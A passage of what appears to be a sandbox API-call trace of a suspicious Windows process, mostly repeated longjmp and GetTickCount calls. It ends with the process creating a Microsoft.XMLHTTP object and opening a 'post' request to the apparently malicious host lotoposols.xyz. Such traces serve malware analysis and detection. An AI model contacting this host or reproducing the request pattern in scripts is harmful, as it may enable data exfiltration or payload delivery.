puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0077.583] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0077.583] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x1
	[0077.583] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x0
	[0077.583] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0077.586] GetTickCount () returned 0x114b77d
	[0077.586] longjmp () 
	[0077.586] longjmp () 
	[0077.586] longjmp () 
	[0077.586] GetCurrentThreadId () returned 0x9a8
	[0077.586] GetCurrentThreadId () returned 0x9a8
	[0077.586] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0077.586] malloc (_Size=0x80) returned 0x3c88b0
	[0077.587] longjmp () 
	[0077.587] longjmp () 
	[0077.587] longjmp () 
	[0077.587] longjmp () 
	[0077.587] longjmp () 
	[0077.587] longjmp () 
	[0077.587] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.588] longjmp () 
	[0077.589] longjmp () 
	[0077.589] longjmp () 
	[0077.589] longjmp () 
	[0077.589] longjmp () 
	[0077.589] longjmp () 
	[0077.589] longjmp () 
	[0077.589] longjmp () 
	[0077.590] longjmp () 
	[0077.590] longjmp () 
	[0077.590] longjmp () 
	[0077.590] longjmp () 
	[0077.590] longjmp () 
	[0077.590] longjmp () 
	[0077.590] GetTickCount () returned 0x114b77d
	[0077.590] longjmp () 
	[0077.590] longjmp () 
	[0077.591] longjmp () 
	[0077.591] longjmp () 
	[0077.591] longjmp () 
	[0077.591] longjmp () 
	[0077.591] longjmp () 
	[0077.591] longjmp () 
	[0077.591] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.592] longjmp () 
	[0077.593] longjmp () 
	[0077.593] longjmp () 
	[0077.593] longjmp () 
	[0077.593] longjmp () 
	[0077.593] longjmp () 
	[0077.593] longjmp () 
	[0077.593] longjmp () 
	[0077.594] longjmp () 
	[0077.594] longjmp () 
	[0077.594] longjmp () 
	[0077.594] longjmp () 
	[0077.594] longjmp () 
	[0077.594] longjmp () 
	[0077.594] longjmp () 
	[0077.595] longjmp () 
	[0077.595] GetTickCount () returned 0x114b77d
	[0077.595] longjmp () 
	[0077.595] longjmp () 
	[0077.595] longjmp () 
	[0077.595] longjmp () 
	[0077.595] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.596] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.597] longjmp () 
	[0077.598] longjmp () 
	[0077.598] longjmp () 
	[0077.598] longjmp () 
	[0077.598] longjmp () 
	[0077.598] longjmp () 
	[0077.598] longjmp () 
	[0077.598] longjmp () 
	[0077.599] longjmp () 
	[0077.599] longjmp () 
	[0077.599] longjmp () 
	[0077.599] longjmp () 
	[0077.599] GetTickCount () returned 0x114b78d
	[0077.599] longjmp () 
	[0077.599] longjmp () 
	[0077.599] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.600] longjmp () 
	[0077.601] longjmp () 
	[0077.601] longjmp () 
	[0077.601] longjmp () 
	[0077.601] longjmp () 
	[0077.601] longjmp () 
	[0077.601] longjmp () 
	[0077.601] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.602] longjmp () 
	[0077.603] longjmp () 
	[0077.603] longjmp () 
	[0077.603] longjmp () 
	[0077.603] longjmp () 
	[0077.603] longjmp () 
	[0077.603] longjmp () 
	[0077.603] GetTickCount () returned 0x114b78d
	[0077.603] longjmp () 
	[0077.603] longjmp () 
	[0077.604] longjmp () 
	[0077.604] longjmp () 
	[0077.604] longjmp () 
	[0077.604] longjmp () 
	[0077.604] longjmp () 
	[0077.604] longjmp () 
	[0077.604] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.605] longjmp () 
	[0077.606] longjmp () 
	[0077.606] longjmp () 
	[0077.606] longjmp () 
	[0077.606] longjmp () 
	[0077.606] longjmp () 
	[0077.607] longjmp () 
	[0077.607] longjmp () 
	[0077.607] longjmp () 
	[0077.607] longjmp () 
	[0077.607] longjmp () 
	[0077.607] longjmp () 
	[0077.608] longjmp () 
	[0077.608] longjmp () 
	[0077.608] longjmp () 
	[0077.608] longjmp () 
	[0077.608] GetTickCount () returned 0x114b78d
	[0077.608] longjmp () 
	[0077.608] longjmp () 
	[0077.609] longjmp () 
	[0077.609] longjmp () 
	[0077.609] longjmp () 
	[0077.609] longjmp () 
	[0077.609] longjmp () 
	[0077.610] longjmp () 
	[0077.610] longjmp () 
	[0077.610] longjmp () 
	[0077.610] longjmp () 
	[0077.610] longjmp () 
	[0077.610] longjmp () 
	[0077.611] longjmp () 
	[0077.611] longjmp () 
	[0077.611] longjmp () 
	[0077.611] longjmp () 
	[0077.611] longjmp () 
	[0077.612] longjmp () 
	[0077.612] longjmp () 
	[0077.612] longjmp () 
	[0077.612] longjmp () 
	[0077.612] longjmp () 
	[0077.612] longjmp () 
	[0077.612] longjmp () 
	[0077.613] longjmp () 
	[0077.613] longjmp () 
	[0077.613] longjmp () 
	[0077.613] longjmp () 
	[0077.613] longjmp () 
	[0077.614] longjmp () 
	[0077.614] longjmp () 
	[0077.614] GetTickCount () returned 0x114b79c
	[0077.614] longjmp () 
	[0077.614] longjmp () 
	[0077.614] longjmp () 
	[0077.615] longjmp () 
	[0077.615] longjmp () 
	[0077.615] longjmp () 
	[0077.615] longjmp () 
	[0077.615] longjmp () 
	[0077.615] longjmp () 
	[0077.616] longjmp () 
	[0077.616] longjmp () 
	[0077.616] longjmp () 
	[0077.616] longjmp () 
	[0077.616] longjmp () 
	[0077.616] longjmp () 
	[0077.617] longjmp () 
	[0077.617] longjmp () 
	[0077.617] longjmp () 
	[0077.617] longjmp () 
	[0077.617] longjmp () 
	[0077.617] longjmp () 
	[0077.618] longjmp () 
	[0077.618] longjmp () 
	[0077.618] longjmp () 
	[0077.618] longjmp () 
	[0077.618] longjmp () 
	[0077.619] longjmp () 
	[0077.619] longjmp () 
	[0077.619] longjmp () 
	[0077.619] longjmp () 
	[0077.619] longjmp () 
	[0077.619] longjmp () 
	[0077.620] GetTickCount () returned 0x114b79c
	[0077.620] longjmp () 
	[0077.620] longjmp () 
	[0077.620] longjmp () 
	[0077.620] longjmp () 
	[0077.620] longjmp () 
	[0077.621] longjmp () 
	[0077.621] longjmp () 
	[0077.621] longjmp () 
	[0077.621] longjmp () 
	[0077.621] longjmp () 
	[0077.621] longjmp () 
	[0077.622] longjmp () 
	[0077.622] longjmp () 
	[0077.622] longjmp () 
	[0077.622] longjmp () 
	[0077.622] longjmp () 
	[0077.622] longjmp () 
	[0077.623] longjmp () 
	[0077.623] longjmp () 
	[0077.623] longjmp () 
	[0077.623] longjmp () 
	[0077.623] longjmp () 
	[0077.623] longjmp () 
	[0077.624] longjmp () 
	[0077.624] longjmp () 
	[0077.624] longjmp () 
	[0077.624] longjmp () 
	[0077.624] longjmp () 
	[0077.624] longjmp () 
	[0077.625] longjmp () 
	[0077.625] longjmp () 
	[0077.625] longjmp () 
	[0077.625] GetTickCount () returned 0x114b79c
	[0077.625] longjmp () 
	[0077.625] longjmp () 
	[0077.626] longjmp () 
	[0077.626] longjmp () 
	[0077.626] longjmp () 
	[0077.626] longjmp () 
	[0077.626] longjmp () 
	[0077.626] longjmp () 
	[0077.627] longjmp () 
	[0077.627] longjmp () 
	[0077.627] longjmp () 
	[0077.627] longjmp () 
	[0077.627] longjmp () 
	[0077.628] longjmp () 
	[0077.628] longjmp () 
	[0077.628] longjmp () 
	[0077.628] longjmp () 
	[0077.628] longjmp () 
	[0077.628] longjmp () 
	[0077.629] longjmp () 
	[0077.629] longjmp () 
	[0077.629] longjmp () 
	[0077.629] longjmp () 
	[0077.629] longjmp () 
	[0077.629] longjmp () 
	[0077.630] longjmp () 
	[0077.630] longjmp () 
	[0077.630] longjmp () 
	[0077.630] longjmp () 
	[0077.630] longjmp () 
	[0077.631] longjmp () 
	[0077.631] longjmp () 
	[0077.631] GetTickCount () returned 0x114b7ac
	[0077.631] longjmp () 
	[0077.631] longjmp () 
	[0077.631] longjmp () 
	[0077.631] longjmp () 
	[0077.632] longjmp () 
	[0077.632] longjmp () 
	[0077.632] longjmp () 
	[0077.632] longjmp () 
	[0077.632] longjmp () 
	[0077.632] longjmp () 
	[0077.633] longjmp () 
	[0077.633] longjmp () 
	[0077.633] longjmp () 
	[0077.633] longjmp () 
	[0077.633] longjmp () 
	[0077.634] longjmp () 
	[0077.634] longjmp () 
	[0077.634] longjmp () 
	[0077.634] longjmp () 
	[0077.634] longjmp () 
	[0077.634] longjmp () 
	[0077.635] longjmp () 
	[0077.635] longjmp () 
	[0077.635] longjmp () 
	[0077.635] longjmp () 
	[0077.635] longjmp () 
	[0077.635] longjmp () 
	[0077.636] longjmp () 
	[0077.636] longjmp () 
	[0077.636] longjmp () 
	[0077.636] longjmp () 
	[0077.636] longjmp () 
	[0077.636] GetTickCount () returned 0x114b7ac
	[0077.636] longjmp () 
	[0077.637] longjmp () 
	[0077.637] longjmp () 
	[0077.637] longjmp () 
	[0077.637] longjmp () 
	[0077.637] longjmp () 
	[0077.638] longjmp () 
	[0077.638] longjmp () 
	[0077.638] longjmp () 
	[0077.638] longjmp () 
	[0077.638] longjmp () 
	[0077.638] longjmp () 
	[0077.639] longjmp () 
	[0077.639] longjmp () 
	[0077.639] longjmp () 
	[0077.639] longjmp () 
	[0077.639] longjmp () 
	[0077.639] longjmp () 
	[0077.640] longjmp () 
	[0077.640] longjmp () 
	[0077.640] longjmp () 
	[0077.640] longjmp () 
	[0077.640] longjmp () 
	[0077.640] longjmp () 
	[0077.640] longjmp () 
	[0077.641] longjmp () 
	[0077.641] longjmp () 
	[0077.641] longjmp () 
	[0077.641] longjmp () 
	[0077.641] longjmp () 
	[0077.641] longjmp () 
	[0077.642] longjmp () 
	[0077.642] GetTickCount () returned 0x114b7ac
	[0077.642] longjmp () 
	[0077.983] longjmp () 
	[0077.983] longjmp () 
	[0077.984] longjmp () 
	[0077.984] longjmp () 
	[0077.984] longjmp () 
	[0077.984] longjmp () 
	[0077.984] longjmp () 
	[0077.984] longjmp () 
	[0077.985] longjmp () 
	[0077.985] longjmp () 
	[0077.985] longjmp () 
	[0077.985] longjmp () 
	[0077.986] longjmp () 
	[0077.986] longjmp () 
	[0077.986] longjmp () 
	[0077.986] longjmp () 
	[0077.986] longjmp () 
	[0077.986] longjmp () 
	[0077.987] longjmp () 
	[0077.987] longjmp () 
	[0077.987] longjmp () 
	[0077.987] longjmp () 
	[0077.987] longjmp () 
	[0077.987] longjmp () 
	[0077.987] longjmp () 
	[0077.988] longjmp () 
	[0077.988] longjmp () 
	[0077.988] longjmp () 
	[0077.988] longjmp () 
	[0077.988] longjmp () 
	[0077.988] longjmp () 
	[0077.989] GetTickCount () returned 0x114b829
	[0077.989] longjmp () 
	[0077.989] longjmp () 
	[0077.989] longjmp () 
	[0077.989] longjmp () 
	[0077.990] longjmp () 
	[0077.990] longjmp () 
	[0077.990] longjmp () 
	[0077.990] longjmp () 
	[0077.990] longjmp () 
	[0077.990] longjmp () 
	[0077.991] longjmp () 
	[0077.991] longjmp () 
	[0077.991] longjmp () 
	[0077.991] longjmp () 
	[0077.991] longjmp () 
	[0077.991] longjmp () 
	[0077.992] longjmp () 
	[0077.992] longjmp () 
	[0077.992] longjmp () 
	[0077.992] longjmp () 
	[0077.992] longjmp () 
	[0077.992] longjmp () 
	[0077.992] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.993] longjmp () 
	[0077.994] longjmp () 
	[0077.994] GetTickCount () returned 0x114b829
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.994] longjmp () 
	[0077.995] longjmp () 
	[0077.995] longjmp () 
	[0077.995] longjmp () 
	[0077.995] longjmp () 
	[0077.995] longjmp () 
	[0077.995] longjmp () 
	[0077.996] longjmp () 
	[0077.996] longjmp () 
	[0077.996] longjmp () 
	[0077.998] longjmp () 
	[0077.998] longjmp () 
	[0077.998] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0077.998] SysStringLen (param_1=0x0) returned 0x0
	[0077.998] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0077.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0077.999] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0077.999] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0077.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c88) returned 0x0
	[0077.999] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0077.999] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c88, pUnkSite=0x3cacc0) returned 0x0
	[0078.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0078.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0078.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0078.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0078.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0078.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0078.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0078.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0078.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0078.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0078.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0078.001] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0078.001] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0078.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0078.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0078.001] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0078.001] XMLHTTPRequest:IUnknown:Release (This=0x47a5c88) returned 0x0
	[0078.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0078.001] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0078.002] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0078.002] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0078.002] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0078.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0078.002] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0078.006] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0078.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0078.006] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
